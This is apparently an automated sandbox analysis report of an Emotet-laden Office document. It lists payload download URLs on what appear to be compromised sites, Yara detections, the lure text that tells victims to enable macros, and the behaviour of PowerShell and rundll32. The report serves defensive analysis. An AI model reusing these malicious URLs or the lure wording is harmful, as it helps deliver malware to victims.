3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2111878141.000000001B64C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmpString found in binary or memory: http://crl.use
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2102387342.0000000000274000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000003.2101935876.000000001D06A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111811084.000000001B582000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.o
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2112621761.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2107547753.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2125133029.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116524892.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114817796.00000000020F7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124614651.0000000001EF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2102349882.0000000000224000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2111189798.0000000003C06000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.comh
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111132973.0000000003B72000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 4,072 N@m 13 ;a 1009
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5777
                      Source: unknownProcess created: Commandline size = 5676
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5676Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
